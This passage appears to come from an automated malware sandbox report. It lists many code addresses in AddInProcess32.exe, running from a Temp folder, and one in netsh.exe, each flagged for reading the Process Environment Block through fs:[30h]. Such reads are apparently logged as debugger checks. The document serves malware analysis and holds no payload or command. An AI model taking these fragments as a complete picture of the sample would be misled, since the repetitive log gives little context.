          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01408A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01335210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01335210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01335210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01335210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0133AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0133AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01353A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01348A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0137927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013FEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013C4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01339240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01339240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01339240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01339240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0134AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0134AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01362AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01362ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01343D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01343D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01343D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01343D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01343D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01343D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01343D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01343D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01343D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01343D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01343D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01343D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01343D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0133AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013FE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013BA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01364D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01364D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01364D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01357D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01408D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01373D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013E3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01361DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01361DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01361DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01362581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01362581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01362581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01362581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01332D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01332D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01332D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01332D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01332D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013E8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0134D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0134D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_014005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_014005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0140740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0140740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0140740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01408CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0134849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01334F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01334F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01408F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0140070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0140070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0134FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0134EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01348794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013737F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013EFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0133E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0133C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0133C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0133C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01368E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0134766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01347E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01347E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01347E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01347E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01347E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01347E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01408ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013CFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01400EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01400EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01400EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01378EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013EFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03723B7A mov eax, dword ptr fs:[00000030h]
